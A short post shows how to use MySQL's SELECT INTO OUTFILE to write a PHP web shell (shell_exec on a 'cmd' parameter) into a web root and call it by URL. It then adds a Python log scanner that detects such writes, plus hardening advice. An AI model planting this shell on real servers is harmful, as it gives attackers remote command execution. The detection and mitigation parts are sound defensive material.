Old-school story: Creating a file with MySQL [injection]

Once you are in, enter the code to create the file:

mysql> CREATE TABLE crap (codetab text);
Query OK, 0 rows affected (0.01 sec)

mysql> INSERT INTO crap (codetab) values ('<? $out =
shell_exec($_GET["cmd"]." 2>&1"); echo "<pre>$out</pre>"; ?>');
Query OK, 1 row affected (0.00 sec)

mysql>  SELECT * INTO OUTFILE '/var/www/situsnya/cmd.php' from crap;
Query OK, 1 row affected (0.00 sec)

Now the file can be accessed via
http:// situs.tld/cmd.php?cmd=dir
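
Seen from the defending side, the `SELECT ... INTO OUTFILE` step above shows up in the MySQL query log. The following is an added example, not part of the original post: it scans log lines for server-side file writes and flags targets that land under a web root or carry a script extension. The web-root list, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumed for this example: directories served by a web server, script suffixes.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}

# SELECT ... INTO OUTFILE/DUMPFILE '<path>' with single or double quotes.
OUTFILE_RE = re.compile(
    r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\2", re.IGNORECASE)

def classify(path):
    """Return the reasons a server-side file write target is suspicious."""
    norm = posixpath.normpath(path)  # collapse ../ segments before comparing
    reasons = []
    if any(norm.startswith(root + "/") for root in WEB_ROOTS):
        reasons.append("web-root")
    if posixpath.splitext(norm)[1].lower() in SCRIPT_EXTS:
        reasons.append("script-extension")
    return reasons

def scan(lines):
    """Return (line_no, path, reasons) for every file-writing statement."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = OUTFILE_RE.search(line)
        if m:
            findings.append((no, m.group("path"), classify(m.group("path"))))
    return findings

# Constructed sample lines in the style of the MySQL general query log.
SAMPLE_LOG = [
    "2024-05-01T10:00:01.000000Z\t   12 Query\tSELECT * FROM orders WHERE id = 7",
    "2024-05-01T10:00:02.000000Z\t   12 Query\tSELECT * INTO OUTFILE '/var/www/situsnya/cmd.php' from crap",
    "2024-05-01T10:00:03.000000Z\t   15 Query\tselect id into outfile '/var/lib/mysql-files/export.csv' from orders",
]

if __name__ == "__main__":
    for no, path, reasons in scan(SAMPLE_LOG):
        level = "ALERT" if reasons else "info"
        print(f"{level} line {no}: {path} {reasons}")
```

The write only succeeds when the database account holds the FILE privilege and `secure_file_priv` permits the target directory. Removing FILE from application accounts and pointing `secure_file_priv` at a dedicated export directory that the web server does not serve prevents it outright.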
